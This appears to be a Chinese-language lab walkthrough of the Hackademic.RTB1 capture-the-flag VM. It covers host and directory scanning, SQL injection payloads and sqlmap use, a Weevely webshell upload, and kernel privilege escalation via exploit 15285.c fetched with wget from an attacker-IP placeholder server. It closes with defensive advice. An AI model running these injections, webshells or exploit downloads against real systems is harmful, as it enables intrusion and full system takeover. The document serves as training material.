Hackademic.RTB1 渗透测试教学文档

1. 项目概述

1.1 渗透测试目标

• 获取关键信息 key.txt 文件
• 目标系统位于 /root 目录下

1.2 测试范围

• 内网环境
• 目标系统: Hackademic.RTB1
• 网站地址: http://192.168.22.128

1.3 测试环境

• VMware 虚拟机本地环境
• 内网 IP 段: 192.168.22.0/24

2. 信息收集阶段

2.1 主机发现

使用 Nmap 进行存活主机扫描:

nmap -sn 192.168.22.0/24

发现存活主机: 192.168.22.128 (开放80端口)

2.2 目录扫描

使用 Gobuster 进行目录扫描:

gobuster dir -u http://192.168.22.128 -w /path/to/wordlist

发现:

• WordPress 登录界面 (wp_login)
• 其他图标信息泄露
• 关键信息: key.txt 位于 root 目录下

3. 漏洞验证与利用

3.1 SQL 注入漏洞

3.1.1 初步验证

发现两个可能存在 SQL 注入的页面:

1. 使用 ?cat=1' # 爆出数据库名: WordPress
2. 布尔验证:

   ?cat=1 and 1 = 1 #
   ?cat=1 and 1 = 2 #
   

3.1.2 判断回显列数

?cat=1 group by 5#   # 成功
?cat=1 group by 6#   # 失败

确认回显列数为5列

3.1.3 使用 SQLmap 深入测试

sqlmap -u "http://192.168.22.128/?cat=1" --dbs

3.1.4 获取敏感数据

发现敏感表:

• wp_login
• wp_pass

获取账户密码后，发现目标未开放22端口，推测存在隐藏登录页面

3.2 深入目录扫描

扫描路径:

http://192.168.22.128/Hackademic_RTB1/

发现隐藏登录页面，使用获取的凭据登录:

• 用户名: GeorgeMiller

3.3 文件上传漏洞

发现允许上传的功能点:

• 上传路径: /Hackademic_RTB1/wp-content/

4. 后渗透阶段

4.1 Webshell 生成与连接

使用 Weevely 生成并上传 webshell:

weevely generate <password> shell.php

上传后连接:

weevely http://192.168.22.128/Hackademic_RTB1/wp-content/shell.php <password>

4.2 系统内核提权

4.2.1 系统信息收集

uname -a

发现系统内核: Linux 2.6.3

4.2.2 漏洞利用

1. 搜索发现可用漏洞: 15285.c
2. 在攻击机设置临时HTTP服务器:

   python3 -m http.server 8000
   

3. 在目标机下载并编译:

   wget http://<attacker_ip>:8000/15285.c
   gcc -o exp 15285.c
   chmod +x exp
   ./exp
   

4. 成功获取root权限

4.3 获取flag

cat /root/key.txt

5. 渗透测试结果汇总

发现漏洞类型:

1. 敏感信息泄露
2. SQL注入漏洞
3. 文件上传漏洞
4. 系统内核提权漏洞

关键注意事项:

• 后台功能点寻找需要细致耐心(耗时约40分钟)
• 目录扫描需要全面深入
• 系统内核信息收集对提权至关重要

6. 工具清单

1. Nmap - 主机发现与端口扫描
2. Gobuster - 目录扫描
3. SQLmap - SQL注入自动化测试
4. Weevely - Webshell生成与管理
5. Python HTTP Server - 文件传输
6. GCC - 漏洞利用代码编译

7. 防御建议

1. 对用户输入进行严格过滤，防止SQL注入
2. 限制文件上传类型，避免webshell上传
3. 及时更新系统内核，修补已知漏洞
4. 最小化信息泄露，隐藏敏感路径
5. 实施最小权限原则，限制用户权限